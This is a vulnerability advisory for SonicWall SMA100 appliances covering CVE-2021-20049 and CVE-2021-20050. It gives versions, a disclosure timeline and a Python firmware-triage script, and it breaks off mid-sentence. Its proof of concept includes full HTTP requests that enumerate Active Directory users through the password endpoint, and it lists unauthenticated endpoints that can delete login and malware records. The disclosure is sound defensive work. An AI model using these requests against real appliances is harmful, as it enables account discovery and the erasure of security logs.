During a customer engagement we identified multiple vulnerabilities in the web interface of SonicWall Secure Mobile Access (SMA) that allowed unauthenticated user enumeration and unauthenticated read/delete access to several endpoints of the management API. SonicWall describes SMA as follows:
“SonicWall Secure Mobile Access (SMA) is a unified secure access gateway that enables organizations to provide access to any application, anytime, from anywhere and any devices, including managed and unmanaged.”
CVEs registered
CVE-2021-20049[1]: SONICWALL SMA100 API username enumeration vulnerability
CVE-2021-20050[2]: SMA100 improper access control vulnerability allowed restricted management APIs accessible
Affected versions and platforms
SMA 100 Series
(SMA 200, 210, 400, 410, 500v)
SMA100 firmware 10.2.1.2-24sv and earlier
SMA100 firmware 10.2.0.8-37sv and earlier
Fixed versions
10.2.0.9-41sv
10.2.1.3-27sv
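To turn the affected and fixed versions above into a repeatable check for an SMA 100 inventory, here is an added Python example (not part of the original advisory or of any SonicWall tooling). It assumes the firmware string format shown on this page (`major.minor.patch.revision-<build>sv`), treats any build below the fixed build of its 10.2.x branch as unpatched, and flags branches the advisory does not cover for manual review:

```python
import re
from typing import Dict, List, Optional, Tuple

# Fixed builds from the advisory, keyed by their 10.2.x branch.
FIXED_BUILDS = {
    (10, 2, 0): "10.2.0.9-41sv",
    (10, 2, 1): "10.2.1.3-27sv",
}

# Assumption: SMA100 firmware strings always look like "10.2.1.2-24sv".
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)\.(\d+)-(\d+)sv$")


def parse_version(version: str) -> Tuple[int, ...]:
    """Parse a firmware string into a tuple that compares numerically,
    so that 10.2.1.2-24sv < 10.2.1.3-27sv and 10.2.0.8-37sv < 10.2.0.9-41sv."""
    match = _VERSION_RE.match(version.strip())
    if not match:
        raise ValueError(f"unrecognised SMA100 version string: {version!r}")
    return tuple(int(part) for part in match.groups())


def is_affected(version: str) -> Optional[bool]:
    """True if the build predates the fix for its branch, False if it is at or
    above the fixed build, None if the branch is not covered by the advisory."""
    parsed = parse_version(version)
    fixed = FIXED_BUILDS.get(parsed[:3])
    if fixed is None:
        return None
    return parsed < parse_version(fixed)


def triage(inventory: List[Tuple[str, str]]) -> Dict[str, str]:
    """Classify (hostname, version) pairs as 'patch', 'ok' or 'review'."""
    labels = {True: "patch", False: "ok", None: "review"}
    return {host: labels[is_affected(ver)] for host, ver in inventory}


if __name__ == "__main__":
    # Constructed sample inventory for demonstration only.
    sample = [
        ("sma-dc1", "10.2.1.2-24sv"),   # affected, needs 10.2.1.3-27sv
        ("sma-dc2", "10.2.0.9-41sv"),   # already on the fixed build
        ("sma-lab", "9.0.0.11-31sv"),   # branch not named in the advisory
    ]
    for host, verdict in triage(sample).items():
        print(f"{host}: {verdict}")
```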
Timeline
21/09/2021: Vulnerabilities reported to SonicWall’s PSIRT
28/09/2021: SonicWall reviewed and validated the reported vulnerabilities and confirmed the findings. They stated they “will begin remediation efforts with our development and engineering teams”.
21/12/2021: SonicWall released fixed versions for SMA and published the associated advisories.
CVE-2021-20049: User enumeration
Description
It was possible to enumerate valid users through the change-password API endpoint located at "/__api__/v1/password". If the current password was guessed, it was then possible to change it to an arbitrary one. On the instance we had access to, this allowed us to list users of several domains, one of which was likely an internal Active Directory (AD) domain.
There were several problems here:
The API was reachable by an unauthenticated user
The response message was not generic, allowing one to enumerate users
Proof of Concept
An HTTP request to a non-existing user:
POST /__api__/v1/password HTTP/1.1
Host: X.X.X.X
Content-Type: application/json

{
  "userName": "nonexistinguser",
  "domainName": "SOMEDOMAIN",
  "oldPasswd": "password123",
  "newPasswd": "pwned"
}
Returned an HTTP response as below:
HTTP/1.1 200 OK
Content-Length: 170
{"status": "failure", "messageToken": "SMA_PASSWORD_CHANGE_ERROR_AD_DEFAULT", "defaultMessage": "kerberos_change_password error code {0}", "messageValues": "-1765328378"}
While a request to an existing one:
POST /__api__/v1/password HTTP/1.1
Host: X.X.X.X
Content-Type: application/json

{
  "userName": "existinguser",
  "domainName": "SOMEDOMAIN",
  "oldPasswd": "password123",
  "newPasswd": "pwned"
}
Returned an HTTP response as below:
HTTP/1.1 200 OK
Content-Length: 174
{"status": "failure", "messageToken": "SMA_PASSWORD_CHANGE_ERROR_AUTH_FAILED", "defaultMessage": "Password change failed - Old password is incorrect.", "messageValues": null}
Note the Kerberos error returned for a non-existing user: the difference in error messages allowed an unauthenticated attacker to remotely enumerate internal Active Directory users from the internet.
If the password-changing feature and the AD configuration enforce a lockout threshold on failed attempts, it would also be possible to lock accounts (not tested).
CVE-2021-20050: Improper access control
Description
It was possible to access, without authentication, several endpoints of the threat API described at https://<somedomain>/threat/__api__/v1/doc.json, such as:
https://<somedomain>/threat/__api__/v1/auth
https://<somedomain>/threat/__api__/v1/files
https://<somedomain>/threat/__api__/v1/access
These endpoints allowed us to both list and delete what they contained.
This could be used to discover usernames, delete records of unsuccessful login attempts, and list and delete records of uploaded malicious files, among other things.
Proof of Concept
Open a browser and visit the API endpoints listed above: